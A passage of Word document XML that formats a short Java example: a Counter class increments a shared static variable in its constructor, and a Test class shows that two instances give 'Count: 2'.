          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA96CB" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Counter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577D0EC" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Increment shared static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096CC25" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54227C2F" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A03019F" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> displayCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706215D6" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Count: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DECB437" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA9D62" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0404BF1A" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523FDB8" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C95B4E" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0828D" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Counter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D0C13" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Counter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA51F3A" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Counter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>displayCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Outputs: Count: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABC43E" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19E1EB" w14:textId="5795E445" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
